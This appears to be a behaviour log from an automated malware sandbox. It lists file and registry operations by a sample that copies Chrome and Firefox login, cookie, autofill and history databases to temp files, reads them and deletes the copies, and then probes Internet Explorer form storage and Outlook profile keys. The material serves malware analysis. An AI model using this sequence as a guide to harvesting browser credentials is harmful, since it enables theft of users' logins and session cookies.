Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[3].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[4].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\ type = file_attributes False 2
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\ type = file_attributes False 2
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\ type = file_attributes False 2
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\ type = file_attributes False 2
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\ type = file_attributes False 2
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp type = file_attributes True 1
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp-journal type = file_attributes False 2
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp-wal type = file_attributes False 2
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp type = file_attributes True 1
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-journal type = file_attributes False 1
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-wal type = file_attributes False 2
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-shm type = file_attributes False 1
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp type = file_attributes True 1
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp-journal type = file_attributes False 2
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp-wal type = file_attributes False 2
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp type = file_attributes True 1
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp-journal type = file_attributes False 2
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp-wal type = file_attributes False 2
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp type = file_attributes True 1
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp-journal type = file_attributes False 2
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp-wal type = file_attributes False 2
Open STD_INPUT_HANDLE - True 2
Open STD_OUTPUT_HANDLE - True 2
Open STD_ERROR_HANDLE - True 2
Copy C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data True 1
Copy C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Cookies True 1
Copy C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\cookies.sqlite True 1
Copy C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Web Data True 1
Copy C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Web Data True 1
Fn
Copy C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\History True 1
Fn
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp size = 100, size_out = 100 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp size = 2048, size_out = 2048 True 2
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp size = 16, size_out = 16 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt size = 83, size_out = 83 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt size = 551, size_out = 551 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt size = 241, size_out = 241 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt size = 111, size_out = 111 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt size = 110, size_out = 110 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt size = 276, size_out = 276 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt size = 86, size_out = 86 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt size = 414, size_out = 414 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt size = 414, size_out = 414 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt size = 102, size_out = 102 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt size = 102, size_out = 102 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt size = 93, size_out = 93 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt size = 234, size_out = 234 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt size = 578, size_out = 578 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt size = 101, size_out = 101 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt size = 82, size_out = 82 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt size = 293, size_out = 293 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt size = 221, size_out = 221 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt size = 513, size_out = 513 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt size = 490, size_out = 490 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt size = 456, size_out = 456 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt size = 130, size_out = 130 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt size = 272, size_out = 272 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[1].txt size = 598, size_out = 598 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[3].txt size = 196, size_out = 196 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[4].txt size = 543, size_out = 543 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt size = 272, size_out = 272 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt size = 118, size_out = 118 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt size = 823, size_out = 823 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt size = 206, size_out = 206 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt size = 108, size_out = 108 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt size = 104, size_out = 104 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt size = 178, size_out = 178 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt size = 215, size_out = 215 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt size = 169, size_out = 169 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt size = 1026, size_out = 1026 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt size = 1026, size_out = 1026 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp size = 100, size_out = 100 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp size = 1024, size_out = 1024 True 2
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp size = 16, size_out = 16 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp size = 100, size_out = 100 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp size = 32768, size_out = 32768 True 3
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp size = 100, size_out = 100 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp size = 2048, size_out = 2048 True 5
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp size = 16, size_out = 16 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp size = 100, size_out = 100 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp size = 2048, size_out = 2048 True 5
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp size = 16, size_out = 16 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp size = 100, size_out = 100 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp size = 16, size_out = 16 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-console-l1-1-0.dll size = 18744 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-datetime-l1-1-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-debug-l1-1-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-errorhandling-l1-1-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-2-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l2-1-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-handle-l1-1-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-heap-l1-1-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-interlocked-l1-1-0.dll size = 17856 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-libraryloader-l1-1-0.dll size = 18744 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-localization-l1-2-0.dll size = 20792 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-memory-l1-1-0.dll size = 18744 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-namedpipe-l1-1-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processenvironment-l1-1-0.dll size = 19248 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-0.dll size = 19392 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-1.dll size = 18744 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-profile-l1-1-0.dll size = 17712 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-rtlsupport-l1-1-0.dll size = 17720 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-string-l1-1-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-1-0.dll size = 20280 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-2-0.dll size = 18744 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-sysinfo-l1-1-0.dll size = 19248 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-timezone-l1-1-0.dll size = 18224 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-util-l1-1-0.dll size = 18232 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-conio-l1-1-0.dll size = 19256 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-convert-l1-1-0.dll size = 22328 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-environment-l1-1-0.dll size = 18736 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-filesystem-l1-1-0.dll size = 20280 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-heap-l1-1-0.dll size = 19256 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-locale-l1-1-0.dll size = 18744 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-multibyte-l1-1-0.dll size = 26424 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-runtime-l1-1-0.dll size = 22840 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-string-l1-1-0.dll size = 23488 True 1
Fn
Data
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp - True 1
Fn
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp - True 1
Fn
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-shm - True 1
Fn
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-wal - True 1
Fn
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp - True 1
Fn
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp - True 1
Fn
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp - True 1
Fn
Delete C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp - True 1
Fn
Registry (133)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\05cb6f136411cf4daf1f74e966b0a7dc - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4b62e5f8c092a64ea9b79fd559a5a15e - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\609a848a708f544697003a34105400ef - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\63cba20b08018a458b6edb5d87fb54da - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\828cd3a417cead4ab3a214070dce1c3d - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\88d17fec23cbdd4fb54ad1d34c0dce09 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
